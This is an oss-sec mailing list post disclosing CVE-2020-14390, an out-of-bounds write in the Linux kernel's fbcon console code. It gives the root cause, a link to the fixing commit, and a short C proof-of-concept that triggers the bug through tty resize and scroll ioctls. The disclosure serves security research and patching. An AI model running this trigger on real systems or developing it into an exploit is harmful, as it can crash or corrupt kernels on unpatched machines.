oss-sec mailing list archives
CVE-2020-14390: Linux kernel: slab-out-of-bounds in fbcon
From: Minh Yuan <yuanmingbuaa () gmail com>
Date: Tue, 15 Sep 2020 18:23:20 +0800
Hi,

I found an out-of-bounds write in fbcon_redraw_softback in kernel versions <= 5.9-rc5. The oldest affected kernel version is 2.2.3.

The root cause of this vulnerability is that the value of vc->vc_origin is not updated in time while invoking vc_do_resize.

This is my PoC (it needs permission to open and write the tty, and an fbcon driver must be present):

// author by ziiiro@thu
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

int main(int argc, char **argv)
{
    int fd = open("/dev/tty1", O_RDWR, 0);
    if (fd < 0)
        return 1;

    /* VT_RESIZE (0x5609): 3 rows, 0x21 columns */
    unsigned short size1[3] = {3, 0x21, 0};
    ioctl(fd, 0x5609, size1); // VT_RESIZE

    /* write 30 newlines to the console */
    for (int i = 0; i < 30; i++) {
        write(fd, "\x0a", 1);
    }

    /* TIOCLINUX (0x541c), subcode 13 = TIOCL_SCROLLCONSOLE, scroll by -5 lines */
    signed int args[3] = {13, -5, 0};
    ioctl(fd, 0x541c, args); // TIOCLINUX

    /* VT_RESIZE (0x5609): 3 rows, 0x39 columns */
    unsigned short size2[3] = {3, 0x39, 0};
    ioctl(fd, 0x5609, size2); // VT_RESIZE

    return 0;
}

This is the commit to patch the issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50145474f6ef4a9c19205b173da6264a644c7489

Thanks,
Yuan Ming, Tsinghua University